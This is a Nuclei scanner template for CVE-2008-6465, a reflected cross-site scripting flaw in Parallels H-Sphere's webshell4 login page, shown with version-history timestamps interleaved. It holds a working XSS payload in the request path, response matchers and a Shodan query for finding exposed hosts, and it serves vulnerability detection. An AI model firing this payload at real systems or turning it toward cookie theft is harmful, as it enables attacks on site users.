nuclei-templates/http/cves/2008/CVE-2008-6465.yaml

54 lines
1.9 KiB
YAML
Raw Normal View History

2022-11-06 12:41:14 +00:00
id: CVE-2008-6465
info:
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
2022-11-06 12:41:14 +00:00
author: edoardottt
severity: medium
description: |
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
2023-09-06 13:22:34 +00:00
remediation: |
Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.
2022-11-06 12:41:14 +00:00
reference:
- http://www.xssing.com/index.php?x=3&y=65
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
2022-11-12 07:20:30 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
2022-11-06 12:41:14 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
2022-11-06 12:41:14 +00:00
cve-id: CVE-2008-6465
2023-07-11 19:49:27 +00:00
cwe-id: CWE-79
epss-score: 0.00421
epss-percentile: 0.71319
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:*
2022-11-12 02:32:13 +00:00
metadata:
2022-11-12 07:20:30 +00:00
verified: true
2023-09-06 13:22:34 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: parallels
product: h-sphere
2023-09-06 13:22:34 +00:00
shodan-query: title:"Parallels H-Sphere
2022-11-12 07:20:30 +00:00
tags: cve,cve2008,xss,parallels,h-sphere
2022-11-06 12:41:14 +00:00
http:
2022-11-12 02:32:13 +00:00
- method: GET
path:
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
2022-11-06 12:41:14 +00:00
matchers-condition: and
matchers:
- type: word
2022-11-12 02:32:13 +00:00
part: body
2022-11-06 12:41:14 +00:00
words:
2022-11-12 02:32:13 +00:00
- '\" onfocus=alert(document.domain); autofocus'
- 'Please enter login name & password'
2022-11-12 02:37:51 +00:00
condition: and
2022-11-06 12:41:14 +00:00
- type: word
2022-11-12 02:32:13 +00:00
part: header
2022-11-06 12:41:14 +00:00
words:
2022-11-12 02:32:13 +00:00
- 'text/html'
- type: status
status:
- 200
# digest: 4b0a00483046022100f67014ba367f6a24f4c0aee0a8a7d7111798876af8c5a12787d7acb569d5cc21022100ebb352da5a4ec2e8a15d2098b507772f92aaf66a491636b85fc4113686766cef:922c64590222798bb761d5b6d8e72950